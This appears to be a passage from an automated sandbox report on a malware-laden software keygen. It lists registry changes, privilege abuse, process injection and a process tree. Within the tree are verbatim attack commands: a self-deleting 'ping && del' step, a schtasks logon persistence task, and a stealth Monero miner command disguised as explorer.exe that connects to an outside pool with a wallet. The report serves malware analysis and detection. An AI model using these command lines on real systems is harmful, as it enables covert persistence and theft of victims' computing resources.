Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Process not Found

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4704	PING.EXE
22408	PING.EXE
1880	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5052	WerFault.exe
5052	WerFault.exe
1032	WerFault.exe
1032	WerFault.exe
5108	key.exe
5108	key.exe
584	WerFault.exe
584	WerFault.exe
3956	2440094.exe
3956	2440094.exe
1652	5332411.exe
1652	5332411.exe
880	WerFault.exe
880	WerFault.exe
1252	WerFault.exe
1252	WerFault.exe
3136	WerFault.exe
3136	WerFault.exe
2440	1392307.exe
2440	1392307.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
4784	Setup.exe
2440	1392307.exe
3296	MSI3190.tmp
3296	MSI3190.tmp
4644	chrome3.exe
4644	chrome3.exe
4152	Mie.exe.com
4152	Mie.exe.com
5568	Py5oC1Ysh1XrAkVX9HhYrYwe.exe
5568	Py5oC1Ysh1XrAkVX9HhYrYwe.exe
3196	Process not Found
3196	Process not Found
5252	WerFault.exe
5252	WerFault.exe
4184	WerFault.exe
4184	WerFault.exe
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
4856	WerFault.exe
4856	WerFault.exe
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found
3196	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5568	Py5oC1Ysh1XrAkVX9HhYrYwe.exe

Suspicious behavior: SetClipboardViewer 3 IoCs

pid	Process
2592	2413288.exe
1860	2.exe
400	8902401.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	2.exe
Token: SeDebugPrivilege	1400	PublicDwlBrowser188.exe
Token: SeRestorePrivilege	5052	WerFault.exe
Token: SeBackupPrivilege	5052	WerFault.exe
Token: SeRestorePrivilege	1032	WerFault.exe
Token: SeBackupPrivilege	1032	WerFault.exe
Token: SeBackupPrivilege	5052	WerFault.exe
Token: SeManageVolumePrivilege	4640	md1_1eaf.exe
Token: SeDebugPrivilege	3956	2440094.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeDebugPrivilege	1652	5332411.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeImpersonatePrivilege	5108	key.exe
Token: SeTcbPrivilege	5108	key.exe
Token: SeChangeNotifyPrivilege	5108	key.exe
Token: SeCreateTokenPrivilege	5108	key.exe
Token: SeBackupPrivilege	5108	key.exe
Token: SeRestorePrivilege	5108	key.exe
Token: SeIncreaseQuotaPrivilege	5108	key.exe
Token: SeAssignPrimaryTokenPrivilege	5108	key.exe
Token: SeManageVolumePrivilege	4640	md1_1eaf.exe
Token: SeManageVolumePrivilege	4640	md1_1eaf.exe
Token: SeManageVolumePrivilege	4640	md1_1eaf.exe
Token: SeManageVolumePrivilege	4640	md1_1eaf.exe
Token: SeDebugPrivilege	2440	1392307.exe
Token: SeDebugPrivilege	3016	ss.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
5680	MSIEXEC.EXE
1724	Rimasta.exe.com
1724	Rimasta.exe.com
1724	Rimasta.exe.com
5288	Rimasta.exe.com
5288	Rimasta.exe.com
5288	Rimasta.exe.com
4152	Mie.exe.com
4152	Mie.exe.com
4152	Mie.exe.com
5656	Mie.exe.com
5656	Mie.exe.com
5656	Mie.exe.com

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1724	Rimasta.exe.com
1724	Rimasta.exe.com
1724	Rimasta.exe.com
5288	Rimasta.exe.com
5288	Rimasta.exe.com
5288	Rimasta.exe.com
4152	Mie.exe.com
4152	Mie.exe.com
4152	Mie.exe.com
5656	Mie.exe.com
5656	Mie.exe.com
5656	Mie.exe.com

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
4784	Setup.exe
5128	QU__5Ozc3ACVNYUoYdJj01xh.exe
3336	nYWD1Y8Pv6twWZCGOR0yUBHY.exe
2952	r0HOo1H0DjG_3iBDYXsGJmLf.exe
936	W5FhvjC37Q0Te68Egl2YSMn1.exe
2868	qt33zyxzMKEumJZDqjdXMFcK.exe
5184	gRvcl6kklMo5wkZo2pzOuXAV.exe
5176	E_5MA2Hw9brEnaU0wQL2T5Zb.exe
5192	yxyC6_oy3iEx7xfrRLmVhOjV.exe
5168	Py5oC1Ysh1XrAkVX9HhYrYwe.exe
5224	KpN3P7O4swhPu0gW9n9rco_F.exe
5428	Conhost.exe
5420	q2nY9fszjOSPU307FUeY_FWp.exe
5160	rSEDhS1jUcfFdoe97HSJa3cg.exe
5404	XmqgEZLbL0VU13XBdkXuADW9.exe
5436	6312321.exe
5444	DJOJXgsNy2cGeLdIqFkqoc7U.exe
5396	LslpgDTQAWjA4LIw1ef3v01V.exe
6032	yxyC6_oy3iEx7xfrRLmVhOjV.exe
5064	1.exe
1468	inst001.exe
4520	cutm3.exe
1724	Rimasta.exe.com
5288	Rimasta.exe.com
4152	Mie.exe.com
1916	nUDSlwDUHSw2VLlCkK2N9bZQ.exe
5656	Mie.exe.com
4840	Mie.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1168 wrote to memory of 3592	1168	Vaz.2010.2.1.4.v.2.1.4.serial.number.keygen.exe	77
PID 1168 wrote to memory of 3592	1168	Vaz.2010.2.1.4.v.2.1.4.serial.number.keygen.exe	77
PID 1168 wrote to memory of 3592	1168	Vaz.2010.2.1.4.v.2.1.4.serial.number.keygen.exe	77
PID 3592 wrote to memory of 3856	3592	cmd.exe	81
PID 3592 wrote to memory of 3856	3592	cmd.exe	81
PID 3592 wrote to memory of 3856	3592	cmd.exe	81
PID 3592 wrote to memory of 4688	3592	cmd.exe	83
PID 3592 wrote to memory of 4688	3592	cmd.exe	83
PID 3592 wrote to memory of 4688	3592	cmd.exe	83
PID 3592 wrote to memory of 4668	3592	cmd.exe	84
PID 3592 wrote to memory of 4668	3592	cmd.exe	84
PID 3592 wrote to memory of 4668	3592	cmd.exe	84
PID 3592 wrote to memory of 4648	3592	cmd.exe	86
PID 3592 wrote to memory of 4648	3592	cmd.exe	86
PID 3592 wrote to memory of 4648	3592	cmd.exe	86
PID 4648 wrote to memory of 1196	4648	keygen-step-3.exe	87
PID 4648 wrote to memory of 1196	4648	keygen-step-3.exe	87
PID 4648 wrote to memory of 1196	4648	keygen-step-3.exe	87
PID 3856 wrote to memory of 5108	3856	keygen-pr.exe	88
PID 3856 wrote to memory of 5108	3856	keygen-pr.exe	88
PID 3856 wrote to memory of 5108	3856	keygen-pr.exe	88
PID 3592 wrote to memory of 1444	3592	cmd.exe	89
PID 3592 wrote to memory of 1444	3592	cmd.exe	89
PID 3592 wrote to memory of 1444	3592	cmd.exe	89
PID 1444 wrote to memory of 4624	1444	keygen-step-4.exe	90
PID 1444 wrote to memory of 4624	1444	keygen-step-4.exe	90
PID 1444 wrote to memory of 4624	1444	keygen-step-4.exe	90
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 5108 wrote to memory of 4856	5108	key.exe	92
PID 4624 wrote to memory of 588	4624	Crack.exe	94
PID 4624 wrote to memory of 588	4624	Crack.exe	94
PID 4624 wrote to memory of 588	4624	Crack.exe	94
PID 1444 wrote to memory of 5052	1444	keygen-step-4.exe	111
PID 1444 wrote to memory of 5052	1444	keygen-step-4.exe	111
PID 1444 wrote to memory of 5052	1444	keygen-step-4.exe	111
PID 5052 wrote to memory of 4644	5052	WerFault.exe	98
PID 5052 wrote to memory of 4644	5052	WerFault.exe	98
PID 5052 wrote to memory of 1400	5052	WerFault.exe	99
PID 5052 wrote to memory of 1400	5052	WerFault.exe	99
PID 5052 wrote to memory of 1432	5052	WerFault.exe	101
PID 5052 wrote to memory of 1432	5052	WerFault.exe	101
PID 5052 wrote to memory of 4848	5052	WerFault.exe	102
PID 5052 wrote to memory of 4848	5052	WerFault.exe	102
PID 5052 wrote to memory of 4848	5052	WerFault.exe	102
PID 5052 wrote to memory of 4188	5052	WerFault.exe	103
PID 5052 wrote to memory of 4188	5052	WerFault.exe	103
PID 1444 wrote to memory of 4640	1444	keygen-step-4.exe	104
PID 1444 wrote to memory of 4640	1444	keygen-step-4.exe	104
PID 1444 wrote to memory of 4640	1444	keygen-step-4.exe	104
PID 572 wrote to memory of 664	572	rundll32.exe	106
PID 572 wrote to memory of 664	572	rundll32.exe	106

C:\Users\Admin\AppData\Local\Temp\Vaz.2010.2.1.4.v.2.1.4.serial.number.keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Vaz.2010.2.1.4.v.2.1.4.serial.number.keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    PID:3856
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:4856
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:4688
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
    keygen-step-6.exe
    3⤵
    - Executes dropped EXE
    PID:4668
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
      4⤵
      PID:20612
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:22408
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\winnetdriv.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe" 1631037117 0
      4⤵
      Executes dropped EXE
      PID:1196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 440
        5⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2960
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4624
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe" -a
        5⤵
        Executes dropped EXE
        
        PID:588
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\PBrowFile28.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\PBrowFile28.exe"
      4⤵
      PID:5052
    - - C:\Users\Admin\AppData\Local\Temp\chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        6⤵
        
        PID:2516
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:2904
      - C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        6⤵
        Executes dropped EXE
        
        PID:3772
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        
        PID:6336
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:5508
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:6444
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        7⤵
        
        PID:2176
    - - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1400
      - C:\ProgramData\2440094.exe
        
        "C:\ProgramData\2440094.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3956
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3956 -s 2296
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:880
      - C:\ProgramData\2905909.exe
        
        "C:\ProgramData\2905909.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4176
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:1908
      - C:\ProgramData\1392307.exe
        
        "C:\ProgramData\1392307.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
      - C:\ProgramData\5332411.exe
        
        "C:\ProgramData\5332411.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 2456
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1252
    - - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:3184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 280
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:584
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:4848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 612
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        5⤵
        Executes dropped EXE
        
        PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      PID:4640
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\f2217e5f.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\f2217e5f.exe"
      4⤵
      Executes dropped EXE
      PID:1400
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 284
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\ss.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\ss.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3016
    - - C:\ProgramData\3189415.exe
        
        "C:\ProgramData\3189415.exe"
        5⤵
        Executes dropped EXE
        
        PID:3296
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3296 -s 2340
        6⤵
        Program crash
        
        PID:4152
    - - C:\ProgramData\2413288.exe
        
        "C:\ProgramData\2413288.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:2592
    - - C:\ProgramData\6169197.exe
        
        "C:\ProgramData\6169197.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4784
    - - C:\Users\Admin\Documents\TXekn4yWdozLHwdhDSQH_ibp.exe
        
        "C:\Users\Admin\Documents\TXekn4yWdozLHwdhDSQH_ibp.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:568
    - - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        "C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:960
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 28
        7⤵
        Program crash
        
        PID:5252
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:1440
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:1380
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3644
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2808
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5016
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:1304
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2084
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:496
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5316
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3668
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6960
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1092
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3988
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2140
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5900
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6368
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7816
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5832
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8052
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5012
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
